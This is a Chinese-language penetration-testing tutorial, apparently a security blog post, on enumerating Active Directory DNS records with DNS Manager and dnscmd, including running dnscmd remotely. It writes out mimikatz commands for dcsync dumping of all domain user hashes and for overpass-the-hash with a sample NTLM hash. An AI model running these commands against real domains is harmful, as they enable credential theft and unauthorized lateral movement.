0x00 前言

在域滲透中，對域環(huán)境的信息搜集很關鍵，如果我們獲得了域內管理員的權限，那么如何能夠快速了解域內的網絡架構呢?DNS記錄無疑是一個很好的參考。

本文將要介紹在域滲透中，獲取DNS記錄的常用方法。

0x01 簡介

 

本文將要介紹以下內容：

• 通過DNS Manager獲取DNS記錄
• 通過dnscmd獲取DNS記錄
• 域內遠程讀取DNS記錄的方法

0x02 通過DNS Manager獲取DNS記錄

 

測試系統(tǒng)：

• Windows Server 2008 R2 x64

選擇Administrative Tools -> DNS。

在Forward Lookup Zones下找到當前域名，能夠顯示當前域內的DNS記錄，包括主機名和對應的IP。

如下圖：

0x03 通過dnscmd獲取DNS記錄

 

dnscmd：

用來管理DNS服務器的命令行接口，支持遠程連接。

默認安裝的系統(tǒng)：

• Windows Server 2003
• Windows Server 2008
• Windows Server 2003 R2
• Windows Server 2008 R2
• Windows Server 2012
• Windows Server 2003 with SP1

...

參考資料：

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc772069(v=ws.11)

Win7系統(tǒng)在使用時需要安裝Remote Server Administration Tools (RSAT)

參考地址：

https://support.microsoft.com/en-us/help/2693643/remote-server-administration-tools-rsat-for-windows-operating-systems

RSAT下載地址：

https://www.microsoft.com/en-us/download/details.aspx?id=7887

測試系統(tǒng)：

• · Windows Server 2008 R2 x64

常用命令:

(1)列出DNS區(qū)域中當前節(jié)點的資源記錄：

Dnscmd . /EnumZones 

如下圖：

 

(2)列出test.com的信息：

Dnscmd . /ZoneInfo test.com 

如下圖：

 

(3)列舉test.com中的記錄，方法1(更詳細)：

Dnscmd . /ZonePrint test.com 

如下圖：

 

(4)列舉testc.com的記錄，方法2：

Dnscmd . /EnumRecords test.com . 

如下圖：

 

結果同DNS Manager獲取的記錄一致。

0x04 域內遠程讀取DNS記錄的方法

 

方法分析

前提需要獲得域管理員的權限。

第一種方法是先遠程連接域控制器，然后在域控制器上執(zhí)行dnscmd獲取DNS記錄。

第二種方法是在域內一臺主機上面，執(zhí)行dnscmd遠程讀取DNS記錄。

但是Win7系統(tǒng)默認不支持dnscmd，直接安裝Remote Server Administration Tools (RSAT)也不現實。

于是，我嘗試尋找在未安裝Remote Server Administration Tools (RSAT)的系統(tǒng)上執(zhí)行dnscmd的方法。

方法測試

向未安裝Remote Server Administration Tools (RSAT)的Win7系統(tǒng)上復制一個dnscmd.exe，直接執(zhí)行，結果失敗。

解決方法

通過Process Monitor記錄dnscmd的執(zhí)行過程，查看缺少哪些文件。

如下圖：

 

發(fā)現缺少文件dnscmd.exe.mui。

補全缺少的文件，再次測試，最終找到解決方法。

在未安裝Remote Server Administration Tools (RSAT)的系統(tǒng)上執(zhí)行dnscmd，需要滿足以下條件：

1、dnscmd保存在路徑C:\Windows\System32下

2、dnscmd.exe.mui保存在C:\Windows\System32\en-US下(該位置比較通用，也可以在其他位置)

注：dnscmd和dnscmd.exe.mui使用Windows Server 2008 R2下的即可。

這里提供一個測試文件(我從Windows Server 2008 R2下獲得的)：

https://github.com/3gstudent/test/dnscmd.exe

https://github.com/3gstudent/test/dnscmd.exe.mui

注：

僅供測試。

由于dnscmd在遠程連接時，未提供輸入用戶名和口令的接口，這里需要借助mimikatz的Overpass-the-hash。

首先需要獲得域管理員用戶的hash，這里只能用ntlm/rc4/aes128/aes256

如果獲得了域管理員用戶的明文口令，可以先將明文轉為ntlm，在線加密的網站：

https://md5decrypt.net/en/Ntlm/

補充：使用dcsync獲得域內所有用戶hash的方法。

域控制器上執(zhí)行mimikatz:

mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit" 

實際測試

測試環(huán)境的參數如下：

• 域管理員用戶：Administrator
• 口令：DomainAdmin456!
• hash：A55E0720F0041193632A58E007624B40

Overpass-the-hash:

mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40" 

這樣會彈出一個cmd.exe

接著使用dnscmd遠程連接進行查詢：

Dnscmd WIN-F08C969D7FM.test.com /EnumZones 

or

Dnscmd WIN-F08C969D7FM /EnumZones 

注：這里要使用FQDN或者計算機名。

如下圖：

 

如果想在命令行下實現整個流程，可以采用如下方法：

新建c:\test\1.bat，內容如下：

Dnscmd WIN-F08C969D7FM.test.com /EnumZones > c:\test\out.txt 

Overpass-the-hash:

mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40 /run:\"cmd.exe /c c:\test\1.bat\"" 

注：cmd.exe下"需要使用轉義字符\"

0x05 小結

 

本文介紹了在域內使用Overpass-the-hash實現dnscmd遠程讀取DNS記錄的方法。